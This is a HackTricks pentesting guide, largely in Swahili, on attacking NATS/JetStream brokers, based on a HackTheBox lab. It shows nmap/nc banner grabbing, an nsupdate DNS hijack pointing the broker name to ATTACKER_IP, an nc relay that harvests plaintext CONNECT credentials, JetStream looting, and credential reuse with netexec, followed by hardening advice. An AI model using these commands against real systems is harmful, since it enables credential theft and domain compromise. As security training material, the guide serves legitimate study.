4222 - Pentesting NATS / JetStream

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

NATS ni basi ya ujumbe yenye utendaji wa juu inayotumia protocol rahisi ya maandishi: server hutuma bango la JSON INFO { ... } mara tu baada ya muunganisho wa TCP, na client hujibu kwa fremu ya CONNECT {"user":"USERNAME","pass":"PASSWORD",...} ikifuatiwa na amri za hiari PING/PUB/SUB. JetStream inaongeza primitives za persistence (Streams & Consumers) juu ya port ile ile ya TCP (4222/tcp). TLS na authentication ni hiari, kwa hivyo usanikishaji mwingi wa ndani unaendesha plaintext AUTH.

• Default port: 4222/tcp (4223+ for clustered routes)
• Stock banner fields: "version", "auth_required", "jetstream", "max_payload", "tls_required"

Uorodheshaji

Banner grabbing / service probes

nmap -p4222 -sV --script banner TARGET
# Sample output
# 4222/tcp open  nats  NATS.io gnatsd 2.11.3
# | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576}

INFO frame inaweza pia kuvutwa kwa mkono:

echo | nc HOST 4222
INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true}
-ERR 'Authorization Violation'

Sakinisha CLI rasmi (Go ≥1.21) kwa mwingiliano wa kina:

go install github.com/nats-io/natscli/nats@latest
nats -s nats://HOST:4222 rtt

Authentication failures immediately raise nats: Authorization Violation, so valid creds are required for any meaningful RPC.

Credential capture via DNS/service impersonation

• Tambua rekodi za AD DNS zisizotumika kwa hostname ya broker (kwa mfano nats-svc.domain.local). Ikiwa rekodi inarudisha NXDOMAIN, mtumiaji wa domain mwenye vibali vidogo anaweza kuitengeneza upya kutokana na ACLs za default za dynamic-update. Angalia AD DNS Records abuse kwa maelezo ya msingi.
• Sajili hostname kwa IP inayodhibitiwa na mshambuliaji:

nsupdate
> server DC_IP
> update add nats-svc.domain.local 60 A ATTACKER_IP
> send

• Nakili banner halali mara moja, kisha uirejelee kwa kila mteja anayejitokeza. NATS inaamini mstari wa kwanza wa INFO unaoonekana, hivyo tunahitaji tu kuipitisha kupitia listener:

nc REAL_NATS 4222 | head -1 | nc -lnvp 4222

• Mara tu internal client atakapofanya resolve jina iliyotekwa, itatoa plaintext CONNECT frame inayobeba jozi ya user / pass na telemetry mbalimbali (client name, Go version, protocol level). Kwa sababu hakuna kinachohitajika zaidi ya INFO banner, hata nc inatosha kuvuna siri.
• Kwa shughuli za muda mrefu, endesha server rasmi ndani ya mashine (git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V). TRACE logging tayari inaonyesha usernames; kuondoa redaction helper au kusniff traffic kwa Wireshark kunaonyesha password kamili.

JetStream looting & password hunting

Mara tu kredenshali yoyote itakapopatikana (kwa mfano Dev_Account_A), ihifadhi kama CLI context ili kuepuka kuandika tena:

nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'

Ugunduzi wa JetStream kawaida hufuata muundo huu:

nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage

Tim za streaming mara nyingi huwa zinarekodi matukio ya uthibitishaji kwenye subjects kama logs.auth. Ikiwa waendelezaji watahifadhi raw JSON katika stream ya JetStream, payloads zinaweza kujumuisha plaintext AD usernames na passwords:

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Secrets zilizohifadhiwa zinaweza kisha kurudiwa dhidi ya Kerberos-only services kwa kutumia netexec smb DC01 -u USER -p PASS -k, enabling full domain compromise.

Kuimarisha & utambuzi

• Lazimisha TLS (tls, tls_required, or mTLS via nkey/creds). Bila usimbaji, INFO/CONNECT leaks credentials kwa mtu yeyote on-path.
• Tambua hasa nani anaweza kusasisha DNS – wahamishie service records kwa akaunti maalum na ukague Event IDs 257/252 kwa hostnames zenye thamani kubwa. Unganisha na scavenging alerts ili majina ya broker yaliyokosekana hayawezi kudaiwa kwa kimya kimya.
• Zima credential logging. Futa secrets kabla ya kuchapisha kwa subjects, weka JetStream retention/age limits, na tumia deny_delete=false kwa operators wanaoaminika tu.
• Fuatilia kwa anomalies za banner – muunganisho mfupi unaorudiwa, authentication timeouts, au INFO banners ambazo hazilingani na template iliyothibitishwa zinaonyesha spoofed servers.

Marejeo

• HackTheBox Mirage: Chaining NFS Leaks, Dynamic DNS Abuse, NATS Credential Theft, JetStream Secrets, and Kerberoasting

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.